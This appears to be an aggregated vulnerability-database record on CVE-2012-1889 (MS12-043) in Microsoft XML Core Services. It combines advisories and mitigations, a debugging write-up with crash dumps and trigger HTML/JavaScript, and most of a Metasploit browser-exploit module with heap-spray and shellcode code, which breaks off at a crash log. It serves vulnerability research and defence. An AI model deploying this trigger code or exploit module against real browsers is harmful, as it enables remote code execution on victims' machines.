{"enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2012-1889"]}, {"type": "symantec", "idList": ["SMNTC-53934"]}, {"type": "attackerkb", "idList": ["AKB:AC628AEF-FD96-4B84-8A20-368E27D16854"]}, {"type": "threatpost", "idList": ["THREATPOST:8118BE47AC766B8F6DD708B119E33DFE", "THREATPOST:D260EAACDFFCF67AAA2234048670595E", "THREATPOST:684A9363491231773FDB7BA1EBA2B6C0", "THREATPOST:1B75EB23D874C5D85DA6FEAB65007B4E", "THREATPOST:5EE4EF2254C7A6E51307B04E267B45F8", "THREATPOST:49C25ED2BE0FD4019AAA40EBE11EF946"]}, {"type": "exploitdb", "idList": ["EDB-ID:19186"]}, {"type": "saint", "idList": ["SAINT:46694E962B00AF2326A1EEB3134C6536", "SAINT:786C635C0128E667EC292A7093B95663", "SAINT:F68D62A6E6DB5B164C2421615C903854"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:113765"]}, {"type": "mskb", "idList": ["KB2722479"]}, {"type": "seebug", "idList": ["SSV:60271", "SSV:60204"]}, {"type": "cisa", "idList": ["CISA:7267E59351C96006CADADD4154FFBCB1"]}, {"type": "nessus", "idList": ["SMB_NT_MS12-043.NASL", "SMB_KB2719615.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:802864", "OPENVAS:1361412562310802864"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/MSXML_GET_DEFINITION_CODE_EXEC"]}, {"type": "kitploit", "idList": ["KITPLOIT:201756244894943835"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12464"]}], "modified": "2019-05-29T19:48:26", "rev": 2}, "score": {"value": 9.1, "vector": "NONE", "modified": "2019-05-29T19:48:26", "rev": 2}, "vulnersScore": 9.1}, "published": "2012-06-13T04:46:00", "id": "MS12_043", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "edition": 2, "bulletinFamily": "exploit", "viewCount": 6, "cvelist": ["CVE-2012-1889"], "modified": "2012-06-13T04:46:00", "references": [], "description": "**Name**| ms12_043 \n---|--- \n**CVE**| CVE-2012-1889 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| MS12-043 Microsoft Internet Explorer XML Core Services Uninitialized Memory Corruption \n**Notes**| CVE Name: CVE-2012-1889 \nVENDOR: Microsoft \nNotes: \nThis exploit takes advantage of an uninitialized variable vulnerability as exploited in the wild. \nWhen the get_definition function is called with no value, the CElement assumes the child obj is \ninitialized which results in remote code execution. \n \nTested on: \n* Windows XP Professional SP3 English with Internet Explorer 7 \n* Windows XP Professional SP3 English with Internet Explorer 8 \n* Windows Vista English with Internet Explorer 7 \n* Windows Vista English with Internet Explorer 8 \n* Windows 7 Ultimate English with Internet Explorer 8 \n* Windows 7 Ultimate English with Internet Explorer 9 \n \nUsage (important): \nIf possible, try to avoid using the js_recon module with this exploit as loading \nthird party software may damage heap offsets. \n \nVersionsAffected: Internet Explorer 6/7/8/9 \nRepeatability: \nMSADV: MS12-043 \nReferences: http://technet.microsoft.com/en-us/security/bulletin/ms12-043 \nCVE Url: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1889 \nDate public: 06/12/2012 \nCVSS: 9.5 \n\n", "type": "canvas", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/ms12_043", "lastseen": "2019-05-29T19:48:26", "reporter": "Immunity Canvas", "title": "Immunity Canvas: MS12_043", "scheme": null}

{"cve": [{"lastseen": "2020-10-03T12:06:03", "description": "Microsoft XML Core Services 3.0, 4.0, 5.0, and 6.0 accesses uninitialized memory locations, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site.", "edition": 4, "cvss3": {}, "published": "2012-06-13T04:46:00", "title": "CVE-2012-1889", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1889"], "modified": "2020-09-28T12:58:00", "cpe": ["cpe:/a:microsoft:xml_core_services:3.0", "cpe:/a:microsoft:xml_core_services:4.0", "cpe:/a:microsoft:xml_core_services:5.0", "cpe:/a:microsoft:xml_core_services:6.0"], "id": "CVE-2012-1889", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1889", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:xml_core_services:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:xml_core_services:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:xml_core_services:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:xml_core_services:3.0:*:*:*:*:*:*:*"]}], "symantec": [{"lastseen": "2018-03-13T14:30:46", "bulletinFamily": "software", "cvelist": ["CVE-2012-1889"], "description": "### Description\n\nMicrosoft XML Core Services is prone to a remote code-execution vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial-of-service conditions. Microsoft XML Core Services versions 3.0, 4.0, 5.0, and 6.0 are affected.\n\n### Technologies Affected\n\n * Avaya CallPilot 4.0 \n * Avaya CallPilot 5.0 \n * Avaya Communication Server 1000 Telephony Manager 3.0 \n * Avaya Communication Server 1000 Telephony Manager 4.0 \n * Avaya Conferencing Standard Edition 6.0 \n * Avaya Conferencing Standard Edition 6.0 SP1 \n * Avaya Meeting Exchange - Client Registration Server \n * Avaya Meeting Exchange - Recording Server \n * Avaya Meeting Exchange - Streaming Server \n * Avaya Meeting Exchange - Web Conferencing Server \n * Avaya Meeting Exchange - Webportal \n * Avaya Messaging Application Server 5 \n * Avaya Messaging Application Server 5.2 \n * Microsoft XML Core Services 3.0 \n * Microsoft XML Core Services 4.0 \n * Microsoft XML Core Services 5.0 \n * Microsoft XML Core Services 6.0 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Set web browser security to disable the execution of script code or active content.** \nSince a successful exploit of this issue requires malicious code to execute in web clients, consider disabling support for script code and active content within the client browser. Note that this mitigation tactic might adversely affect legitimate websites that rely on the execution of browser-based script code.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nCurrently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of any more recent information, please mail us at: vuldb@securityfocus.com.\n", "modified": "2012-06-12T00:00:00", "published": "2012-06-12T00:00:00", "id": "SMNTC-53934", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/53934", "type": "symantec", "title": "Microsoft XML Core Services CVE-2012-1889 Remote Code Execution Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "attackerkb": [{"lastseen": "2020-11-15T18:36:37", "bulletinFamily": "info", "cvelist": ["CVE-2012-1889"], "description": "Microsoft XML Core Services 3.0, 4.0, 5.0, and 6.0 accesses uninitialized memory locations, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site.\n\n \n**Recent assessments:** \n \n**wchen-r7** at September 12, 2019 6:07pm UTC reported:\n\nThis is known as a \u201cstate-sponsored \u201d 0-day to attack certain Gmail users. It has been committed as msxml_get_definition_code_exec.rb in the Metasploit Framework. However, the current version only targets IE6/7 on Windows XP, because the uninitialized memory is on the heap on those targets. On Win Vista + IE 7 and Win XP + IE8, however, it is on the \nstack.\n\n# Debugging Notes\n\nCrash:\n \n \n 0:008> r\n eax=020bf2f0 ebx=00000000 ecx=00000000 edx=00000001 esi=020bf2f0 edi=020bf528\n eip=749bd772 esp=020bf1a8 ebp=020bf2e4 iopl=0 nv up ei pl nz na pe nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206\n msxml3!_dispatchImpl::InvokeHelper+0xb4:\n 749bd772 ff5118 call dword ptr [ecx+18h] ds:0023:00000018=????????\n \n 0:008> k\n ChildEBP RetAddr\n 020bf2e4 749bdb13 msxml3!_dispatchImpl::InvokeHelper+0xb4\n 020bf320 749d4d84 msxml3!_dispatchImpl::Invoke+0x5e\n 020bf360 749dcae4 msxml3!DOMNode::Invoke+0xaa\n 020bf394 749bd5aa msxml3!DOMDocumentWrapper::Invoke+0x50\n 020bf3f0 749d6e6c msxml3!_dispatchImpl::InvokeEx+0xfa\n 020bf420 633a6d37 msxml3!_dispatchEx<IXMLDOMNode,&LIBID_MSXML2,&IID_IXMLDOMNode,0>::InvokeEx+0x2d\n 020bf460 633a6c75 jscript!IDispatchExInvokeEx2+0xf8\n 020bf49c 633a9cfe jscript!IDispatchExInvokeEx+0x6a\n 020bf55c 633a9f3c jscript!InvokeDispatchEx+0x98\n 020bf590 633a77ff jscript!VAR::InvokeByName+0x135\n 020bf5dc 633a85c7 jscript!VAR::InvokeDispName+0x7a\n 020bf60c 633a9c0b jscript!VAR::InvokeByDispID+0xce\n 020bf7a8 633a5ab0 jscript!CScriptRuntime::Run+0x2989\n 020bf890 633a59f7 jscript!ScrFncObj::CallWithFrameOnStack+0xff\n 020bf8dc 633a5743 jscript!ScrFncObj::Call+0x8f\n 020bf958 633891f1 jscript!CSession::Execute+0x175\n 020bf9a4 63388f65 jscript!COleScript::ExecutePendingScripts+0x1c0\n 020bfa08 63388d7f jscript!COleScript::ParseScriptTextCore+0x29a\n 020bfa30 635bf025 jscript!COleScript::ParseScriptText+0x30\n 020bfa88 635be7ca mshtml!CScriptCollection::ParseScriptText+0x219\n \n\nThe crash occurs in dispatchImpl::InvokeHelper(), where:\n \n \n .text:749BD751 mov eax, dword ptr [ebp+pvarg.anonymous_0+8] ;pvarg.anonymous_0+8 = pvarg.lVal\n .text:749BD754 cmp eax, ebx ; This checks if eax is null, but doesn't check if [eax] is null\n .text:749BD756 mov esi, eax\n .text:749BD758 jz short loc_749BD780\n .text:749BD75A push [ebp+arg_20]\n .text:749BD75D mov ecx, [eax] ; Null pointer dereference, because we didn't check [eax]\n .text:749BD75F push [ebp+arg_1C]\n .text:749BD762 push [ebp+arg_18]\n .text:749BD765 push edi\n .text:749BD766 push 3\n .text:749BD768 push [ebp+arg_C]\n .text:749BD76B push offset _GUID_NULL\n .text:749BD770 push ebx\n .text:749BD771 push eax\n .text:749BD772 call dword ptr [ecx+18h] ; Crash\n \n\nHeap vs Stack:\n\nSome setups allocate the data on the heap, or a simple heap spray will just do the trick. \nBut some setups allocate it on the stack, which is a little trick. We found the following solution \nfrom baidu to put data on the stack:\n \n \n var src = unescape(\"%u1111%u1111\");\n while (src.length < 0x1002) src += src;\n src = \"\\\\\\\\xxx\" + src;\n src = src.substr(0, 0x1000 - 10);\n var pic = document.createElement(\"img\");\n pic.src = src;\n pic.nameProp;\n \n\nSo in the end, this is how we trigger the bug:\n \n \n <object classid=\"clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4\" id=\"#{object_id}\"></object>\n <script>\n var obj = document.getElementById('#{object_id}').object;\n var src = unescape(\"%u0c08%u0c0c\");\n while (src.length < 0x1002) src += src;\n src = \"\\\\\\\\\\\\\\\\xxx\" + src;\n src = src.substr(0, 0x1000 - 10);\n var pic = document.createElement(\"img\");\n pic.src = src;\n pic.nameProp;\n obj.definition(#{rand(999) + 1});\n </script>\n \n\nFinal version of the exploit: \n<https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb>\n\n# Analysis\n\nVupen published a nice blog post about advanced exploitation with this bug here:\n\n<http://www.vupen.com/blog/20120717.Advanced_Exploitation_of_Internet_Explorer_XML_CVE-2012-1889_MS12-043.php>\n\nUnfortunately, the presented exploitation techniques can not be used if we can not control the \nuninitialized data in the stack:\n \n \n .text:727457A0 lea eax, [ebp+vtDisp]\n .text:727457A3 push eax ; pvarg\n .text:727457A4 call ds:__imp__VariantInit@4 ; VariantInit(x)\n .text:727457AA push ebx\n .text:727457AB lea eax, [ebp+vtDisp]\n .text:727457AE push eax\n .text:727457AF push 2\n .text:727457B1 push ebx\n .text:727457B2 push [ebp+dispid]\n .text:727457B5 push [ebp+pTarget]\n .text:727457B8 call dword ptr [esi+20h] ; DOMNode::_invokeDOMNode\n .text:727457BB cmp eax, ebx\n .text:727457BD jl loc_72740BB6\n \n\nAs VUPEN explained in their blog post, DOMNode::_invokeDOMNode should init the memory location at ebp+vtDisp, \nbut it\u2019s not always true, so controlling ebp+vtDisp allow to reach:\n \n \n .text:727457C3 mov eax, dword ptr [ebp+vtDisp.___u0+8] ; Danger: it isn't ebp+vtDisp, but ebp+vtDisp+8\n .text:727457C6 mov esi, eax\n .text:727457C8 cmp eax, ebx\n .text:727457CA jz short loc_727457F5\n .text:727457CC push [ebp+puArgErr]\n .text:727457CF mov ecx, [eax] ; crash\n .text:727457D1 push [ebp+pExcepInfo]\n .text:727457D4 push [ebp+pVarResult]\n .text:727457D7 push edi\n .text:727457D8 push 3\n .text:727457DA push [ebp+lcid]\n .text:727457DD push offset _GUID_NULL\n .text:727457E2 push ebx\n .text:727457E3 push eax\n .text:727457E4 call dword ptr [ecx+18h]\n .text:727457E7 mov [ebp+hr], eax\n .text:727457EA mov eax, [esi]\n .text:727457EC push esi\n .text:727457ED call dword ptr [eax+8]\n \n\nWhere the memory in the stack can be used to do interesting thing. The problem is how to put interesting objects \nin the stack, since the pic.nameProp; method doesn\u2019t look usefull at all. There is a lack of documentation in the \nVUPEN blog post about how to make it happen, since it assumes you can control the memory in the stack, and just \nexplores the exploitation possibilities.\n\nThere is a clue? in the VUPEN blog:\n\n\u201cThe vulnerable variable can be assigned according to the way xmlDoc.definition is called. There are many ways to \nput a particular pointer in the vulnerable variable. We can use for example introspection on an object and call \nxmlDoc.definition on each of its attributes to list the available objects\u201d\n\nHonestly, here is where VUPEN impresses me, because atm I don\u2019t spot how to put a \u201cpartirular pointer in the \nvulnerable variable\u201d. Even when playing with introspection seems to allow some results:\n \n \n <html>\n <body onload=\"f()\">\n \n <div id=\"div\">\n <object id=\"obj\" style=\"display:none\"></object>\n </div>\n \n <pre id=\"results\">\n \n </pre>\n \n <script>\n function f() {\n var test = new ActiveXObject(\"Msxml2.DOMDocument.6.0\");\n var results = document.getElementById(\"results\");\n \n results.innerHTML += \"obj attributes: </br>\";\n \n var count = 0\n for (var v in obj) {\n results.innerHTML += v;\n results.innerHTML += \"<br />\";\n if (count == 0)\n test.definition(v)\n count++;\n }\n alert(count)\n \n var o = obj.cloneNode()\n div.appendChild(o)\n \n results.innerHTML += \"After append, new obj attributes <br />\"\n \n count = 0\n for (var v in obj) {\n results.innerHTML += v;\n results.innerHTML += \"<br />\";\n count++\n }\n alert(count)\n \n }\n </script>\n \n </body>\n </html>\n \n\nMakes the next crash:\n \n \n 0:004> r\n eax=605aa838 ebx=00000000 ecx=5d5b5e5f edx=00000001 esi=605aa838 edi=021fa2a8\n eip=703457e4 esp=021f9f2c ebp=021fa068 iopl=0 nv up ei pl nz na po nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202\n msxml6!_dispatchImpl::InvokeHelper+0xb3:\n 703457e4 ff5118 call dword ptr [ecx+18h] ds:0023:5d5b5e77=????????\n 0:004> dd eax\n 605aa838 5d5b5e5f 890008c2 ffff5c8d ea38e9ff\n 605aa848 c88bffff 8306e9c1 840f01e1 0015ef37\n 605aa858 5421d233 c9851024 ef32840f 8c8b0015\n 605aa868 00008c24 83fa2b00 048d03e1 fffffcbd\n 605aa878 89c10bff 008c2484 e8c10000 24448902\n 605aa888 247c831c 840f0010 fffff7f0 15ef26e9\n 605aa898 0f178b00 c10852b6 82f704e2 6066392c\n 605aa8a8 00004000 9ae5850f ef830017 0ff83b04\n 0:004> u eax\n mshtml!CElement::put_innerHTML+0x75:\n 605aa838 5f pop edi\n 605aa839 5e pop esi\n 605aa83a 5b pop ebx\n 605aa83b 5d pop ebp\n 605aa83c c20800 ret 8\n 605aa83f 898d5cffffff mov dword ptr [ebp-0A4h],ecx\n 605aa845 e938eaffff jmp mshtml!CSpliceTreeEngine::RemoveSplice+0x7ec (605a9282)\n 605aa84a 8bc8 mov ecx,eax\n \n\nSecond try, just follow the VUPEN\u2019s instructions:\n \n \n <html>\n <body onload=\"f()\">\n \n <div id=\"div\">\n <object id=\"obj\" style=\"display:none\"></object>\n </div>\n \n <pre id=\"results\">\n \n </pre>\n \n <script>\n function f() {\n var test = new ActiveXObject(\"Msxml2.DOMDocument.6.0\");\n \n var count = 0\n for (var v in obj) {\n if (count == 0)\n test.definition(v)\n count++;\n }\n alert(count)\n \n var o = obj.cloneNode()\n div.appendChild(o)\n \n count = 0\n for (var v in obj) {\n v;\n }\n \n }\n </script>\n \n </body>\n </html>\n \n\nGenerates an ugly crash, which doesn\u2019t look profitable at all :\n \n \n (d14.df0): Access violation - code c0000005 (first chance)\n First chance exceptions are reported before any exception handling.\n This exception may be expected and handled.\n eax=00000001 ebx=00000000 ecx=703701f2 edx=00000001 esi=00000001 edi=0227a2c8\n eip=703457cf esp=02279f6c ebp=0227a088 iopl=0 nv up ei pl nz na po nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202\n msxml6!_dispatchImpl::InvokeHelper+0x9e:\n 703457cf 8b08 mov ecx,dword ptr [eax] ds:0023:00000001=????????\n \n\nAnother try, trying to get definition, at the end of instrospection:\n \n \n <html>\n <body onload=\"f()\">\n \n <div id=\"div\">\n <object id=\"obj\" style=\"display:none\"></object>\n </div>\n \n <pre id=\"results\">\n \n </pre>\n \n <script>\n function f() {\n var test = new ActiveXObject(\"Msxml2.DOMDocument.6.0\");\n \n var count = 0\n for (var v in obj) {\n if (count == 175)\n test.definition(v)\n count++;\n }\n alert(count)\n \n var o = obj.cloneNode()\n div.appendChild(o)\n \n count = 0\n for (var v in obj) {\n v;\n }\n \n }\n </script>\n \n </body>\n </html>\n \n\nSame crash:\n \n \n 0:005> g\n (1ac.bb0): Access violation - code c0000005 (first chance)\n First chance exceptions are reported before any exception handling.\n This exception may be expected and handled.\n eax=00000001 ebx=00000000 ecx=703701f2 edx=00000001 esi=00000001 edi=022f9e50\n eip=703457cf esp=022f9af4 ebp=022f9c10 iopl=0 nv up ei pl nz na po nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202\n msxml6!_dispatchImpl::InvokeHelper+0x9e:\n 703457cf 8b08 mov ecx,dword ptr [eax] ds:0023:00000001=????????\n \n\nMaybe with fuzzing :? time to grinder\u2026\n", "modified": "2020-10-19T00:00:00", "published": "2012-06-13T00:00:00", "id": "AKB:AC628AEF-FD96-4B84-8A20-368E27D16854", "href": "https://attackerkb.com/topics/Y31WYp9Q89/cve-2012-1889---ms12-043-microsoft-xml-core-services-msxml-uninitialized-memory-corruption", "type": "attackerkb", "title": "CVE-2012-1889 - MS12-043 Microsoft XML Core Services MSXML Uninitialized Memory Corruption", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2016-10-03T15:01:55", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1889"], "description": "Added: 06/27/2012 \nCVE: [CVE-2012-1889](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1889>) \nBID: [53934](<http://www.securityfocus.com/bid/53934>) \nOSVDB: [82873](<http://www.osvdb.org/82873>) \n\n\n### Background\n\n[Microsoft XML Core Services](<http://msdn.microsoft.com/en-us/library/ms763742.aspx>) allows developers to create XML-based applications. \n\n### Problem\n\nA memory corruption vulnerability allows command execution when a user opens a specially crafted web page, which causes MSXML to access an uninitialized object. \n\n### Resolution\n\nSee [Microsoft Security Advisory 2719615](<http://technet.microsoft.com/en-us/security/advisory/2719615>) for fix information and workarounds. \n\n### References\n\n<http://technet.microsoft.com/en-us/security/advisory/2719615> \n\n\n### Limitations\n\nExploit works on Windows XP and Windows 7 and requires a user to open the exploit page in Internet Explorer 8 or 9. \n\nJRE 6 must be installed on Windows 7 targets. \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2012-06-27T00:00:00", "published": "2012-06-27T00:00:00", "id": "SAINT:46694E962B00AF2326A1EEB3134C6536", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/msxml_memory_corruption", "type": "saint", "title": "Microsoft XML Core Services memory corruption", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-04T23:19:39", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1889"], "description": "Added: 06/27/2012 \nCVE: [CVE-2012-1889](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1889>) \nBID: [53934](<http://www.securityfocus.com/bid/53934>) \nOSVDB: [82873](<http://www.osvdb.org/82873>) \n\n\n### Background\n\n[Microsoft XML Core Services](<http://msdn.microsoft.com/en-us/library/ms763742.aspx>) allows developers to create XML-based applications. \n\n### Problem\n\nA memory corruption vulnerability allows command execution when a user opens a specially crafted web page, which causes MSXML to access an uninitialized object. \n\n### Resolution\n\nSee [Microsoft Security Advisory 2719615](<http://technet.microsoft.com/en-us/security/advisory/2719615>) for fix information and workarounds. \n\n### References\n\n<http://technet.microsoft.com/en-us/security/advisory/2719615> \n\n\n### Limitations\n\nExploit works on Windows XP and Windows 7 and requires a user to open the exploit page in Internet Explorer 8 or 9. \n\nJRE 6 must be installed on Windows 7 targets. \n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2012-06-27T00:00:00", "published": "2012-06-27T00:00:00", "id": "SAINT:786C635C0128E667EC292A7093B95663", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/msxml_memory_corruption", "title": "Microsoft XML Core Services memory corruption", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T19:19:30", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1889"], "edition": 2, "description": "Added: 06/27/2012 \nCVE: [CVE-2012-1889](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1889>) \nBID: [53934](<http://www.securityfocus.com/bid/53934>) \nOSVDB: [82873](<http://www.osvdb.org/82873>) \n\n\n### Background\n\n[Microsoft XML Core Services](<http://msdn.microsoft.com/en-us/library/ms763742.aspx>) allows developers to create XML-based applications. \n\n### Problem\n\nA memory corruption vulnerability allows command execution when a user opens a specially crafted web page, which causes MSXML to access an uninitialized object. \n\n### Resolution\n\nSee [Microsoft Security Advisory 2719615](<http://technet.microsoft.com/en-us/security/advisory/2719615>) for fix information and workarounds. \n\n### References\n\n<http://technet.microsoft.com/en-us/security/advisory/2719615> \n\n\n### Limitations\n\nExploit works on Windows XP and Windows 7 and requires a user to open the exploit page in Internet Explorer 8 or 9. \n\nJRE 6 must be installed on Windows 7 targets. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2012-06-27T00:00:00", "published": "2012-06-27T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/msxml_memory_corruption", "id": "SAINT:F68D62A6E6DB5B164C2421615C903854", "type": "saint", "title": "Microsoft XML Core Services memory corruption", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:24:31", "description": "", "published": "2012-06-16T00:00:00", "type": "packetstorm", "title": "Microsoft XML Core Services MSXML Uninitialized Memory Corruption", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1889"], "modified": "2012-06-16T00:00:00", "id": "PACKETSTORM:113765", "href": "https://packetstormsecurity.com/files/113765/Microsoft-XML-Core-Services-MSXML-Uninitialized-Memory-Corruption.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \ninclude Msf::Exploit::Remote::BrowserAutopwn \nautopwn_info({ \n:ua_name => HttpClients::IE, \n:ua_minver => \"6.0\", \n:ua_maxver => \"7.0\", \n:javascript => true, \n:os_name => OperatingSystems::WINDOWS, \n:classid => \"{f6D90f11-9c73-11d3-b32e-00C04f990bb4}\", \n:method => \"definition\", \n:rank => NormalRanking \n}) \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"Microsoft XML Core Services MSXML Uninitialized Memory Corruption\", \n'Description' => %q{ \nThis module exploits a memory corruption flaw in Microsoft XML Core Services \nwhen trying to access an uninitialized Node with the getDefinition API, which \nmay corrupt memory allowing remote code execution. At the moment, this module \nonly targets Microsoft XML Core Services 3.0 via IE6 and IE7 over Windows XP SP3. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'sinn3r', # Metasploit module \n'juan vazquez' # Metasploit module \n], \n'References' => \n[ \n[ 'CVE', '2012-1889' ], \n[ 'OSVDB', '82873'], \n[ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2719615' ], \n[ 'URL', 'http://www.zdnet.com/blog/security/state-sponsored-attackers-using-ie-zero-day-to-hijack-gmail-accounts/12462' ] \n], \n'Payload' => \n{ \n'BadChars' => \"\\x00\", \n'Space' => 1024 \n}, \n'DefaultOptions' => \n{ \n'ExitFunction' => \"none\", \n'InitialAutoRunScript' => 'migrate -f' \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n# msxml3.dll 8.90.1101.0 \n[ 'Automatic', {} ], \n[ 'IE 6 on Windows XP SP3', { 'Offset' => '0x800 - code.length' } ], \n[ 'IE 7 on Windows XP SP3', { 'Offset' => '0x800 - code.length' } ] \n], \n'Privileged' => false, \n'DisclosureDate' => \"Jun 12 2012\", \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) \n], self.class) \nend \n \ndef get_target(agent) \n#If the user is already specified by the user, we'll just use that \nreturn target if target.name != 'Automatic' \n \nif agent =~ /NT 5\\.1/ and agent =~ /MSIE 6/ \nreturn targets[1] #IE 6 on Windows XP SP3 \nelsif agent =~ /NT 5\\.1/ and agent =~ /MSIE 7/ \nreturn targets[2] #IE 7 on Windows XP SP3 \nelse \nreturn nil \nend \nend \n \ndef on_request_uri(cli, request) \nagent = request.headers['User-Agent'] \nmy_target = get_target(agent) \n \n# Avoid the attack if the victim doesn't have the same setup we're targeting \nif my_target.nil? \nprint_error(\"#{cli.peerhost}:#{cli.peerport} - Browser not supported: #{agent.to_s}\") \nsend_not_found(cli) \nreturn \nend \n \n# Set payload depending on target \np = payload.encoded \n \njs_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch)) \njs_nops = Rex::Text.to_unescape(\"\\x0c\"*4, Rex::Arch.endian(target.arch)) \n \njs = <<-JS \nvar heap_obj = new heapLib.ie(0x20000); \nvar code = unescape(\"#{js_code}\"); \nvar nops = unescape(\"#{js_nops}\"); \n \nwhile (nops.length < 0x80000) nops += nops; \nvar offset = nops.substring(0, #{my_target['Offset']}); \nvar shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); \n \nwhile (shellcode.length < 0x40000) shellcode += shellcode; \nvar block = shellcode.substring(0, (0x80000-6)/2); \n \nheap_obj.gc(); \n \nfor (var i=1; i < 0xa70; i++) { \nheap_obj.alloc(block); \n} \n \nJS \n \njs = heaplib(js, {:noobfu => true}) \n \nif datastore['OBFUSCATE'] \njs = ::Rex::Exploitation::JSObfu.new(js) \njs.obfuscate \nend \n \nobject_id = rand_text_alpha(4) \n \nhtml = <<-EOS \n<html> \n<head> \n<script> \n#{js} \n</script> \n</head> \n<body> \n<object classid=\"clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4\" id=\"#{object_id}\"></object><script> \ndocument.getElementById(\"#{object_id}\").object.definition(#{rand(1000)+1}); \n</script> \n</body> \n</html> \nEOS \n \nhtml = html.gsub(/^\\t/, '') \n \nprint_status(\"#{cli.peerhost}:#{cli.peerport} - Sending html\") \nsend_response(cli, html, {'Content-Type'=>'text/html'}) \n \nend \n \nend \n \n=begin \n \n* Crash on Windows XP SP3 - msxml3.dll 8.90.1101.0 \n \n(e34.358): Access violation - code c0000005 (first chance) \nFirst chance exceptions are reported before any exception handling. \nThis exception may be expected and handled. \neax=7498670c ebx=00000000 ecx=5f5ec68b edx=00000001 esi=7498670c edi=0013e350 \neip=749bd772 esp=0013e010 ebp=0013e14c iopl=0 nv up ei pl nz na 